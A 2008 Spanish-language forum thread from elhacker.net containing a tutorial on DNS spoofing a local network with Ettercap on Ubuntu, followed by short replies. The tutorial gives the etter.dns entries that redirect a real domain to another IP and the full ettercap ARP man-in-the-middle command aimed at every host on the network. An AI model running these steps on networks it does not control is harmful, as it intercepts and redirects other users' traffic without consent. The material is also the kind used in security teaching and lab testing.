elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: DNS Spoofing usando Ettercap (en Ubuntu) by v-getah  (Leído 21,796 veces)
V-Getah

Desconectado Desconectado

Mensajes: 4



Ver Perfil
DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
« en: 29 Noviembre 2008, 14:12 pm »

Hola


Soy V-Getah y en este tutorial les voy mostrar como se hace DNS Spoof en una rede WLAN mediante el ettercap...





Bueno lo que necesitan de instalar es el solo el ettercap.



Ahora lo que haremos es abrir la Consola y necesitamos de saber qual es la placa de rede a que vamos spoofear el DNS.

Para saber eso ejecutamos este comando:
Citar
ifconfig







Ya temos el nombre de la placa de red usada (ver imagen) ahora vamos buscar el fichero etter.dns, para eso escribimos esto en la Consola:



Citar
locate etter.dns







Lo mio es: /usr/share/ettercao/etter.dns



Ahora en la consola escribimos sudo gedit seguido de la localizacion del etter.dns y nos abrira el fichero. Ejemplo:



Citar
sudo gedit /usr/share/ettercap/etter.dns



Les aparecera algo a pedir tu password y la escribes depues se abrira el etter.dns con el gedit:









Estas son las lineas que vamos hacer corresponder los DNS a los IPs pretendidos :$



Código:

################################

# microsoft sucks ;)

# redirect it to www.linux.org

#



microsoft.com      A   207.46.197.32



##########################################




Hum vamos por ejemplo hacer con que www.diosdelared.com sea redireccionado para 72.14.221.104 que es el IP de google (para saber los IPs ejecuten el comando nslookup).



Entonces lo que escriberiamos seria esto:



Citar
www.diosdelared.com  A   72.14.221.104

diosdelared.com      A   72.14.221.104  

*.diosdelared.com    A   72.14.221.104  



y el fichero etter.dns quedaria asi:



Código:

############################################################################

#                                                                          #

#  ettercap -- etter.dns -- host file for dns_spoof plugin                 #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

############################################################################

#                                                                          #

# Sample hosts file for dns_spoof plugin                                   #

#                                                                          #

# the format is (for A query):                                             #

#   www.myhostname.com A 168.11.22.33                                      #

#   *.foo.com          A 168.44.55.66                                      #

#                                                                          #

# or for PTR query:                                                        #

#   www.bar.com A 10.0.0.10                                                #

#                                                                          #

# or for MX query:                                                         #

#    domain.com MX xxx.xxx.xxx.xxx                                         #

#                                                                          #

# or for WINS query:                                                       #

#    workgroup WINS 127.0.0.1                                              #

#    PC*       WINS 127.0.0.1                                              #

#                                                                          #

# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #

#       so if you want to reverse poison you have to specify a plain       #

#       host. (look at the www.microsoft.com example)                      #

#                                                                          #

############################################################################



################################

# microsoft sucks ;)

# redirect it to www.linux.org

#



www.diosdelared.com  A   72.14.221.104

diosdelared.com      A   72.14.221.104  

*.diosdelared.com    A   72.14.221.104  



##########################################

# no one out there can have our domains...

#



www.alor.org  A 127.0.0.1

www.naga.org  A 127.0.0.1



###############################################

# one day we will have our ettercap.org domain

#



www.ettercap.org           A  127.0.0.1

ettercap.sourceforge.net   A  216.136.171.201



###############################################

# some MX examples

#



alor.org   MX  127.0.0.1

naga.org   MX  127.0.0.1



###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

#



LAB-PC*  WINS  127.0.0.1



# vim:ts=8:noexpandtab




Ahora vamos ejecutar el comando "su" para nos loguearmos como root y de seguida este comando:



Citar
ettercap -T -q -i eth1 -P dns_spoof -M arp // //



Explicacion del comando:



Código:

-T = text mode



-q = quiet



-i = interface (la mia es eth1)



-P dns_spoof = usar el plugin dns_spoof del ettercap



-M arp = ManInTheMiddle ARP



// // = Todas las maquinas de la red






Y nos va sallir esto:











Ahora voy a una maquina con windows instalado y:







Si hay dudas o qualquier pergunta hagan! Este tuto fue 100% hecho por mi si lo van copiar dejen los creditos



Greetz:



xtremo, reberto, Login-Root, MurdeR, KaoS, Ragnarok, kfOO, Anarkill, Xarnuz, NoStress, m0x, zer0-z0org



Copyright © V-Getah 2008
« Última modificación: 29 Noviembre 2008, 14:15 pm por V-Getah » En línea

peib0l
Wiki

Desconectado Desconectado

Mensajes: 3.493


freedom


Ver Perfil WWW
Re: DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
« Respuesta #1 en: 1 Diciembre 2008, 23:43 pm »

ooo de PM tio solo una cosa escribe bien el texto y avisame por MP tenemos que hablar



Salu2
En línea

V-Getah

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
« Respuesta #2 en: 20 Agosto 2010, 05:04 am »

Mi idioma es el portugues por eso pido disculpa de algun erro en la escrita  :-X
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
« Respuesta #3 en: 23 Agosto 2010, 11:18 am »

genial =) está bien que la gente se esfuerce en hacer tutoriales originales por ellos, y mucho más si existe el handicap del idioma xD
En línea

Colaboraciones:
1 2
birria4

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
« Respuesta #4 en: 23 Julio 2012, 01:15 am »

hola ya hice todo y en el paso final hago un ping y me sale timed out
y si intento ingresar a la pagina simplemente no me sale uqe hice mal
aunque en el ping si me sale que se redirecciono a la direccion ip que yo queria
En línea

Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: DNS Spoofing usando Ettercap (en Ubuntu) by v-getah
« Respuesta #5 en: 10 Agosto 2012, 13:53 pm »

Muy bueno pero una pregunta como desactivo el spoof, le quit y me salio que estaba apagado pero sigue redirigiendo a la otra ip
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
No funciona DNS Spoofing con Ettercap
Hacking
rockernaxo 6 11,946 Último mensaje 4 Noviembre 2012, 03:54 am
por cyberboom!
El fundador de Silk Road estaba usando Ubuntu cuando fue detenido
Noticias
wolfbcn 0 1,515 Último mensaje 22 Noviembre 2013, 14:08 pm
por wolfbcn
dns spoofing ettercap y set
Hacking
Gege387 2 2,548 Último mensaje 21 Marzo 2016, 15:20 pm
por Gege387
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines